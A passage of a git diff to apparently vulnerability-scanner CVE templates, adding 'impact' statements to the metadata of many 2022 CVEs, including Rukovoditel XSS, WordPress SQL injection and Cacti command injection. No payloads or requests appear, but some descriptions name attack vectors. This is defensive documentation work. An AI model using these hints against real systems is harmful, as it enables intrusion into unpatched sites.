Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 262b60e9e4..926686f564 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index c434f4f2b0..94ede95454 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index bc6d3f6413..f25e3160f5 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index 3f9a2bee8a..d689f2c962 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the necessary patches provided by the vendor to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 296fc28802..eccc9d6fd2 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index 5e1cacb62e..c4c0b833f1 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.5. reference: - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index a276895caa..98280d4c26 100644 --- a/http/cves/2022/CVE-2022-4321.yaml 
+++ b/http/cves/2022/CVE-2022-4321.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website. remediation: Fixed in version 1.1.2 reference: - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644 diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index 8e966b1a4f..a9202e2793 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.10.1. reference: - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395 diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 32f9fcdb9a..bc2b6c6b8a 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2. reference: - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769- diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 8bd7152a0d..afc67499fe 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 4402472f87..0467bc7e23 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index c701dcab4e..ee42ef4bff 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index a87e8ae434..5206c35de4 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index aa4255478e..293c0a8413 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index baf57d7b3b..ab029ac79f 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 74d911c817..c714824fad 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index b3b3fc22f5..2889320327 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 9c0ef4ed25..7e0232ed63 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index e357a922aa..c72d721d2b 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index ea453bea03..dc9f74a4e8 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of WBCE CMS or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index d67fa08ebf..580dad2f65 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords) + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks or unauthorized access. remediation: | Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 582761084a..a60bf7adc3 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: Update to version 2.7.7 or a newer patched version. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index d40fe660b5..8735b64b81 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server. remediation: Fixed in version 2.0.0. reference: - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 60dd833485..10d0a95bbe 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade to ILIAS eLearning version 7.16 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index c10858d4eb..edeea54e13 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WBCE CMS v1.5.4 can implement getshell by modifying the upload file type. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 074c2393a1..4d4010440e 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index e5f77e224f..80b9cc66e7 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index a78ac4b0a0..f882553c32 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index c999f74e9d..a90cd7719b 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or update provided by the vendor to fix the XSS vulnerability in the Linear eMerge E3-Series. reference: diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index b50863f36f..94d833ba75 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 2074edbf42..f61dbfa00a 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor. remediation: | Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index b9a92660cc..cf6647a820 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index c87f3accd0..db47c757b7 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system. remediation: | Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS. reference: diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 3ee933bddc..999dcab05f 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application. remediation: | Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 031ccd3df9..1669762c80 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure. remediation: | Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 27025e8b5e..5b9c2d6c4b 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | Apply the latest security patches and updates provided by the Thinkphp framework. reference: diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 8c6113c600..b91e449d50 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index fd4175d965..f2854d017e 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: The obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x. reference: - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/ diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index d45b1d5b30..ca9640685c 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index f28847931e..32fb1c691b 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations. + impact: | + The vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 6ed061333a..7f45555df8 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml 
